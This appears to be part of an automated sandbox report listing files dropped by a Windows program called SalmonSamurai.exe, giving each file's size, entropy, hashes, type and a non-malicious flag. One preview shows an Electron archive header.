                                                                                                                                                                                                                                              SHA-256:523D141E59095DA71A41C14AEC8FE9EE667AE4B868E0477A46DD18A80B2007EF
                                                                                                                                                                                                                                              SHA-512:E4796134048CD12056D746F6B8F76D9EA743C61FEE5993167F607959F11FD3B496429C3E61ED5464551FD1931DE4878AB06F23A3788EE34BB56F53DB25BCB6DF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1056673
                                                                                                                                                                                                                                              Entropy (8bit):4.264965642462621
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:8B38C65FC30210C7AF9B6FA0424266F4
                                                                                                                                                                                                                                              SHA1:116413710FFCF94FBFA38CB97A47731E43A306F5
                                                                                                                                                                                                                                              SHA-256:E8DF9A74417C5839C531D7CCAB63884A80AFB731CC62CBBB3FD141779086AC7D
                                                                                                                                                                                                                                              SHA-512:0FD349C644AC1A2E7ED0247E40900D3A9957F5BEF1351B872710D02687C934A8E63D3A7585E91F7DF78054AEFF8F7ABD8C93A94FCD20C799779A64278BAB2097
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):863911
                                                                                                                                                                                                                                              Entropy (8bit):4.295071040310227
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:C0EF1866167D926FB351E9F9BF13F067
                                                                                                                                                                                                                                              SHA1:6092D04EF3CE62BE44C29DA5D0D3A04985E2BC04
                                                                                                                                                                                                                                              SHA-256:88DF231CF2E506DB3453F90A797194662A5F85E23BBAC2ED3169D91A145D2091
                                                                                                                                                                                                                                              SHA-512:9E2B90F3AC1AE5744C22C2442FBCD86A8496AFC2C58F6CA060D6DBB08AF6F7411EF910A7C8CA5AEDEE99B5443D4DFF709C7935E8322CB32F8B071EE59CAEE733
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):390303
                                                                                                                                                                                                                                              Entropy (8bit):5.258177538585681
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:9B3E2F3C49897228D51A324AB625EB45
                                                                                                                                                                                                                                              SHA1:8F3DAEC46E9A99C3B33E3D0E56C03402CCC52B9D
                                                                                                                                                                                                                                              SHA-256:61A3DAAE72558662851B49175C402E9FE6FD1B279E7B9028E49506D9444855C5
                                                                                                                                                                                                                                              SHA-512:409681829A861CD4E53069D54C80315E0C8B97E5DB4CD74985D06238BE434A0F0C387392E3F80916164898AF247D17E8747C6538F08C0EF1C5E92A7D1B14F539
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):383011
                                                                                                                                                                                                                                              Entropy (8bit):5.424530593988954
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:AF0FD9179417BA1D7FCCA3CC5BEE1532
                                                                                                                                                                                                                                              SHA1:F746077BBF6A73C6DE272D5855D4F1CA5C3AF086
                                                                                                                                                                                                                                              SHA-256:E900F6D0DD9D5A05B5297618F1FE1600C189313DA931A9CB390EE42383EB070F
                                                                                                                                                                                                                                              SHA-512:C94791D6B84200B302073B09357ABD2A1D7576B068BAE01DCCDA7BC154A6487145C83C9133848CCF4CB9E6DC6C5A9D4BE9D818E5A0C8F440A4E04AE8EABD4A29
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                              Size (bytes):395064
                                                                                                                                                                                                                                              Entropy (8bit):5.365550895872654
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:181D2A0ECE4B67281D9D2323E9B9824D
                                                                                                                                                                                                                                              SHA1:E8BDC53757E96C12F3CD256C7812532DD524A0EA
                                                                                                                                                                                                                                              SHA-256:6629E68C457806621ED23AA53B3675336C3E643F911F8485118A412EF9ED14CE
                                                                                                                                                                                                                                              SHA-512:10D8CC9411CA475C9B659A2CC88D365E811217D957C82D9C144D94843BC7C7A254EE2451A6F485E92385A660FA01577CFFA0D64B6E9E658A87BEF8FCCBBEAF7E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):439920
                                                                                                                                                                                                                                              Entropy (8bit):5.766175831058526
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:18D49D5376237BB8A25413B55751A833
                                                                                                                                                                                                                                              SHA1:0B47A7381DE61742AC2184850822C5FA2AFA559E
                                                                                                                                                                                                                                              SHA-256:1729AA5C8A7E24A0DB98FEBCC91DF8B7B5C16F9B6BB13A2B0795038F2A14B981
                                                                                                                                                                                                                                              SHA-512:45344A533CC35C8CE05CF29B11DA6C0F97D8854DAE46CF45EF7D090558EF95C3BD5FDC284D9A7809F0B2BF30985002BE2AA6A4749C0D9AE9BDFF4AD13DE4E570
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):415447
                                                                                                                                                                                                                                              Entropy (8bit):5.426006792591415
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:0D9DEA9E24645C2A3F58E4511C564A36
                                                                                                                                                                                                                                              SHA1:DCD2620A1935C667737EEA46CA7BB2BDCB31F3A6
                                                                                                                                                                                                                                              SHA-256:CA7B880391FCD319E976FCC9B5780EA71DE655492C4A52448C51AB2170EEEF3B
                                                                                                                                                                                                                                              SHA-512:8FCF871F8BE7727E2368DF74C05CA927C5F0BC3484C4934F83C0ABC98ECAF774AD7ABA56E1BF17C92B1076C0B8EB9C076CC949CD5427EFCADE9DDF14F6B56BC5
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):416977
                                                                                                                                                                                                                                              Entropy (8bit):5.401132911995885
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:6A7232F316358D8376A1667426782796
                                                                                                                                                                                                                                              SHA1:8B70FE0F3AB2D73428F19ECD376C5DEBA4A0BB6C
                                                                                                                                                                                                                                              SHA-256:6A526CD5268B80DF24104A7F40F55E4F1068185FEBBBB5876BA2CB7F78410F84
                                                                                                                                                                                                                                              SHA-512:40D24B3D01E20AE150083B00BB6E10BCA81737C48219BCE22FA88FAAAD85BDC8C56AC9B1EB01854173B0ED792E34BDFBAC26D3605B6A35C14CF2824C000D0DA1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):430191
                                                                                                                                                                                                                                              Entropy (8bit):5.460617985170646
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:99EAA3D101354088379771FD85159DE1
                                                                                                                                                                                                                                              SHA1:A32DB810115D6DCF83A887E71D5B061B5EEFE41F
                                                                                                                                                                                                                                              SHA-256:33F4C20F7910BC3E636BC3BEC78F4807685153242DD4BC77648049772CF47423
                                                                                                                                                                                                                                              SHA-512:C6F87DA1B5C156AA206DC21A9DA3132CBFB0E12E10DA7DC3B60363089DE9E0124BBAD00A233E61325348223FC5953D4F23E46FE47EC8E7CA07702AC73F3FD2E9
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):703696
                                                                                                                                                                                                                                              Entropy (8bit):4.836890612319527
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:AB9902025DCF7D5408BF6377B046272B
                                                                                                                                                                                                                                              SHA1:C9496E5AF3E2A43377290A4883C0555E27B1F10F
                                                                                                                                                                                                                                              SHA-256:983B15DCC31D0E9A3DA78CD6021E5ADD2A3C2247322ADED9454A5D148D127AAE
                                                                                                                                                                                                                                              SHA-512:D255D5F5B6B09AF2CDEC7B9C171EEBB1DE1094CC5B4DDF43A3D4310F8F5F223AC48B8DA97A07764D1B44F1D4A14FE3A0C92A0CE6FE9A4AE9A6B4A342E038F842
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):443094
                                                                                                                                                                                                                                              Entropy (8bit):5.818852266406701
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:C6C7396DBFB989F034D50BD053503366
                                                                                                                                                                                                                                              SHA1:089F176B88235CCE5BCA7ABFCC78254E93296D61
                                                                                                                                                                                                                                              SHA-256:439F7D6C23217C965179898754EDCEF8FD1248BDD9B436703BF1FF710701117A
                                                                                                                                                                                                                                              SHA-512:1476963F47B45D2D26536706B7EEBA34CFAE124A3087F7727C4EFE0F19610F94393012CDA462060B1A654827E41F463D7226AFA977654DCD85B27B7F8D1528EB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):427791
                                                                                                                                                                                                                                              Entropy (8bit):5.48540289392965
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:D4BD9F20FD29519D6B017067E659442C
                                                                                                                                                                                                                                              SHA1:782283B65102DE4A0A61B901DEA4E52AB6998F22
                                                                                                                                                                                                                                              SHA-256:F33AFA6B8DF235B09B84377FC3C90403C159C87EDD8CD8004B7F6EDD65C85CE6
                                                                                                                                                                                                                                              SHA-512:ADF8D8EC17E8B05771F47B19E8027F88237AD61BCA42995F424C1F5BD6EFA92B23C69D363264714C1550B9CD0D03F66A7CFB792C3FBF9D5C173175B0A8C039DC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):660194
                                                                                                                                                                                                                                              Entropy (8bit):4.761695251077794
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:CBB817A58999D754F99582B72E1AE491
                                                                                                                                                                                                                                              SHA1:6EC3FD06DEE0B1FE5002CB0A4FE8EC533A51F9FD
                                                                                                                                                                                                                                              SHA-256:4BD7E466CB5F5B0A451E1192AA1ABAAF9526855A86D655F94C9CE2183EC80C25
                                                                                                                                                                                                                                              SHA-512:EFEF29CEDB7B08D37F9DF1705D36613F423E994A041B137D5C94D2555319FFB068BB311884C9D4269B0066746DACD508A7D01DF40A8561590461D5F02CB52F8B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):385361
                                                                                                                                                                                                                                              Entropy (8bit):5.543491670458518
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:502E4A8B3301253ABE27C4FD790FBE90
                                                                                                                                                                                                                                              SHA1:17ABCD7A84DA5F01D12697E0DFFC753FFB49991A
                                                                                                                                                                                                                                              SHA-256:7D72E3ADB35E13EC90F2F4271AD2A9B817A2734DA423D972517F3CFF299165FD
                                                                                                                                                                                                                                              SHA-512:BD270ABAF9344C96B0F63FC8CEC04F0D0AC9FC343AB5A80F5B47E4B13B8B1C0C4B68F19550573A1D965BB18A27EDF29F5DD592944D754B80EA9684DBCEDEA822
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):404460
                                                                                                                                                                                                                                              Entropy (8bit):5.342349721117576
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:39277AE2D91FDC1BD38BEA892B388485
                                                                                                                                                                                                                                              SHA1:FF787FB0156C40478D778B2A6856AD7B469BD7CB
                                                                                                                                                                                                                                              SHA-256:6D6D095A1B39C38C273BE35CD09EB1914BD3A53F05180A3B3EB41A81AE31D5D3
                                                                                                                                                                                                                                              SHA-512:BE2D8FBEDAA957F0C0823E7BEB80DE570EDD0B8E7599CF8F2991DC671BDCBBBE618C15B36705D83BE7B6E9A0D32EC00F519FC8543B548422CA8DCF07C0548AB4
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1043803
                                                                                                                                                                                                                                              Entropy (8bit):4.044068430611977
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:7006691481966109CCE413F48A349FF2
                                                                                                                                                                                                                                              SHA1:6BD243D753CF66074359ABE28CFAE75BCEDD2D23
                                                                                                                                                                                                                                              SHA-256:24EA4028DA66A293A43D27102012235198F42A1E271FE568C7FD78490A3EE647
                                                                                                                                                                                                                                              SHA-512:E12C0D1792A28BF4885E77185C2A0C5386438F142275B8F77317EB8A5CEE994B3241BB264D9502D60BFBCE9CF8B3B9F605C798D67819259F501719D054083BEA
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):965006
                                                                                                                                                                                                                                              Entropy (8bit):4.295544641165274
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:F809BF5184935C74C8E7086D34EA306C
                                                                                                                                                                                                                                              SHA1:709AB3DECFF033CF2FA433ECC5892A7AC2E3752E
                                                                                                                                                                                                                                              SHA-256:9BBFA7A9F2116281BF0AF1E8FFB279D1AA97AC3ED9EBC80C3ADE19E922D7E2D4
                                                                                                                                                                                                                                              SHA-512:DE4B14DD6018FDBDF5033ABDA4DA2CB9F5FCF26493788E35D88C07A538B84FDD663EE20255DFD9C1AAC201F0CCE846050D2925C55BF42D4029CB78B057930ACD
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):811437
                                                                                                                                                                                                                                              Entropy (8bit):4.342029978594925
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:2C41616DFE7FCDB4913CFAFE5D097F95
                                                                                                                                                                                                                                              SHA1:CF7D9E8AD3AA47D683E47F116528C0E4A9A159B0
                                                                                                                                                                                                                                              SHA-256:F11041C48831C93AA11BBF885D330739A33A42DB211DACCF80192668E2186ED3
                                                                                                                                                                                                                                              SHA-512:97329717E11BC63456C56022A7B7F5DA730DA133E3FC7B2CC660D63A955B1A639C556B857C039A004F92E5F35BE61BF33C035155BE0A361E3CD6D87B549DF811
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):411446
                                                                                                                                                                                                                                              Entropy (8bit):5.6133974766805546
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:3A858619502C68D5F7DE599060F96DB9
                                                                                                                                                                                                                                              SHA1:80A66D9B5F1E04CDA19493FFC4A2F070200E0B62
                                                                                                                                                                                                                                              SHA-256:D81F28F69DA0036F9D77242B2A58B4A76F0D5C54B3E26EE96872AC54D7ABB841
                                                                                                                                                                                                                                              SHA-512:39A7EC0DFE62BCB3F69CE40100E952517B5123F70C70B77B4C9BE3D98296772F10D3083276BC43E1DB66ED4D9BFA385A458E829CA2A7D570825D7A69E8FBB5F4
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):705061
                                                                                                                                                                                                                                              Entropy (8bit):4.868598768447113
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:EE70E9F3557B9C8C67BFB8DFCB51384D
                                                                                                                                                                                                                                              SHA1:FC4DFC35CDE1A00F97EEFE5E0A2B9B9C0149751E
                                                                                                                                                                                                                                              SHA-256:54324671A161F6D67C790BFD29349DB2E2D21F5012DC97E891F8F5268BDF7E22
                                                                                                                                                                                                                                              SHA-512:F4E1DA71CB0485851E8EBCD5D5CF971961737AD238353453DB938B4A82A68A6BBAF3DE7553F0FF1F915A0E6640A3E54F5368D9154B0A4AD38E439F5808C05B9F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):617109
                                                                                                                                                                                                                                              Entropy (8bit):5.143761316646653
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:FF0A23974AEF88AFC86ECC806DBF1D60
                                                                                                                                                                                                                                              SHA1:E7BAE97CBB8692A0D106644DFAA9B7D7EA6FCEF0
                                                                                                                                                                                                                                              SHA-256:F245AB242AAFEEF37DB736C780476534FAD0706AA66DCB8B6B8CD181B4778385
                                                                                                                                                                                                                                              SHA-512:AABE8160FAC7E0EB8E8EB80963FE995FA4A802147D1B8F605BC0FE3F8E2474463C1D313471C11C85EB5578112232FDC8E89B8A6D43DBE38A328538FF30A78D08
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):488196
                                                                                                                                                                                                                                              Entropy (8bit):5.7988900625034185
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:3FE6F90F1F990AED508DEDA3810CE8C2
                                                                                                                                                                                                                                              SHA1:3B86F00666D55E984B4ACA1A5E8319FFA8F411FF
                                                                                                                                                                                                                                              SHA-256:5EEBB23221AEBCF0BE01BFC2695F7DD35B17F6769BE1E28E5610D35C9717854B
                                                                                                                                                                                                                                              SHA-512:9AA9D55F112C8B32AA636086CFD2161D97EA313CAC1A44101014128124A03504C992AC8EFD265ABA4E91787AEF7134A14507A600F5EC96FF82DF950A8883828C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):354097
                                                                                                                                                                                                                                              Entropy (8bit):6.680890808929274
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:20F315D38E3B2EDC5832931E7770B62A
                                                                                                                                                                                                                                              SHA1:2390BD585DEC1E884873454BB98B6F1467DCF7BB
                                                                                                                                                                                                                                              SHA-256:53A803724BBF2E7F40AAB860325C348F786EECA1EA5CA39A76B4C4A616E3233F
                                                                                                                                                                                                                                              SHA-512:C338E241DE3561707C7C275B7D6E0FB16185A8CD7112057C08B74FFCE122148EF693FE310C839FF93F102726A78E61DE3E68C8E324F445A07A98EE9C4FDD4E13
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):350032
                                                                                                                                                                                                                                              Entropy (8bit):6.69437398216595
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:524711882CBFB5B95A63EF48F884CFF0
                                                                                                                                                                                                                                              SHA1:1078037687CFC5D038EEB8B63D295239E0EDC47A
                                                                                                                                                                                                                                              SHA-256:9E16499CD96A155D410C8DF4C812C52FF2A750F8C4DB87FD891C1E58C1428C78
                                                                                                                                                                                                                                              SHA-512:16D45A81F7F4606EDA9D12A8B1DA06E3C866B11BDC0C92A4022BFB8D02B885D8F028457CF23E3F7589DFD191ED7F7FBC68C81B6E1411834EDFCBC9CC85E0DC4D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):5245458
                                                                                                                                                                                                                                              Entropy (8bit):7.995476669559971
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:7D5065ECBA284ED704040FCA1C821922
                                                                                                                                                                                                                                              SHA1:095FCC890154A52AD1998B4B1E318F99B3E5D6B8
                                                                                                                                                                                                                                              SHA-256:A10C3D236246E001CB9D434A65FC3E8AA7ACDDDDD9608008DB5C5C73DEE0BA1F
                                                                                                                                                                                                                                              SHA-512:521B2266E3257ADAA775014F77B0D512FF91B087C2572359D68FFE633B57A423227E3D5AF8EE4494538F1D09AA45FFA1FE8E979814178512C37F7088DDD7995D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):8623182
                                                                                                                                                                                                                                              Entropy (8bit):5.556347118206602
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:2DB47AF7467164D1BB58AF47DC46F6CD
                                                                                                                                                                                                                                              SHA1:AA4B3F342F7DFBC01ABE53D777508C486F589446
                                                                                                                                                                                                                                              SHA-256:5FC547A0A658287F101970D3882CE47F8D35735AE0E227B507503A3D9764F358
                                                                                                                                                                                                                                              SHA-512:05B8DB2BC8C1BC6EB17A3B8EAFCA9F3F0E2DB21B79BADF520C2208D60071B081EDA96BA0285C6770E1E51E67A1E116773617B8115901E0B99BACBC9B2D96516D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:....L+..H+..C+..{"files":{"node_modules":{"files":{"@isaacs":{"files":{"cliui":{"files":{"LICENSE.txt":{"size":731,"integrity":{"algorithm":"SHA256","hash":"2dc0465729366c3a7890dfa9e972a1ba7048a26c02116fb8b419a6a1ac110149","blockSize":4194304,"blocks":["2dc0465729366c3a7890dfa9e972a1ba7048a26c02116fb8b419a6a1ac110149"]},"offset":"0"},"build":{"files":{"index.cjs":{"size":10398,"integrity":{"algorithm":"SHA256","hash":"820aa357a7f6a022bfc3ac6ac19d1681921d0421cae898d5096423c0fb3b8607","blockSize":4194304,"blocks":["820aa357a7f6a022bfc3ac6ac19d1681921d0421cae898d5096423c0fb3b8607"]},"offset":"731"},"index.d.cts":{"size":1050,"integrity":{"algorithm":"SHA256","hash":"385fceba2f49ee3f91cd436d3f84b389375e1e8f86906b23f47df2e1b9c2b17b","blockSize":4194304,"blocks":["385fceba2f49ee3f91cd436d3f84b389375e1e8f86906b23f47df2e1b9c2b17b"]},"offset":"11129"},"lib":{"files":{"index.js":{"size":10100,"integrity":{"algorithm":"SHA256","hash":"e67b3446f47d4a672339c99bea9e987979da9fc70f421701814cb9d52ba176
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):107520
                                                                                                                                                                                                                                              Entropy (8bit):6.442687067441468
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:792B92C8AD13C46F27C7CED0810694DF
                                                                                                                                                                                                                                              SHA1:D8D449B92DE20A57DF722DF46435BA4553ECC802
                                                                                                                                                                                                                                              SHA-256:9B1FBF0C11C520AE714AF8AA9AF12CFD48503EEDECD7398D8992EE94D1B4DC37
                                                                                                                                                                                                                                              SHA-512:6C247254DC18ED81213A978CCE2E321D6692848C64307097D2C43432A42F4F4F6D3CF22FB92610DFA8B7B16A5F1D94E9017CF64F88F2D08E79C0FE71A9121E40
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):273328
                                                                                                                                                                                                                                              Entropy (8bit):3.2521181832662194
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:8915DD2A6D6B4EBF9A16C77FE063D8DE
                                                                                                                                                                                                                                              SHA1:A03132ADCB99A82BA269D56AB6577CCFD1BB08E5
                                                                                                                                                                                                                                              SHA-256:C1802B29B13663A8890031411270866834246931F71F41397682DD88FA16D485
                                                                                                                                                                                                                                              SHA-512:ABD93CDD634AD4D38B7E3714B183335CDDB9E3AD14660247CC7285066C95342AC8595D68CD0868B8512E73BB656AB54386045533F998576B2CD6501BF456CD2C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):588152
                                                                                                                                                                                                                                              Entropy (8bit):4.83735352889622
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:4CD37EA771EA4FE2F3AD46217CC02206
                                                                                                                                                                                                                                              SHA1:31680E26869B007E62550E96DBF846B3980D5B2B
                                                                                                                                                                                                                                              SHA-256:95F7B8664306DA8D0073A795E86590ED6FDAEDE5F489132E56C8779F53CF1ED5
                                                                                                                                                                                                                                              SHA-512:E1369734CBE17AAF6DD3CEEFB57F056C5A9346D2887A7D3EE7ED177386D7F5E624407869D53902B56AB350E4DED5612C3B0F52C2DD3EFA307E9947701068A2A0
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):5334528
                                                                                                                                                                                                                                              Entropy (8bit):6.335261874351837
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:524B0D85D992F86A7F26C162F3DBB91C
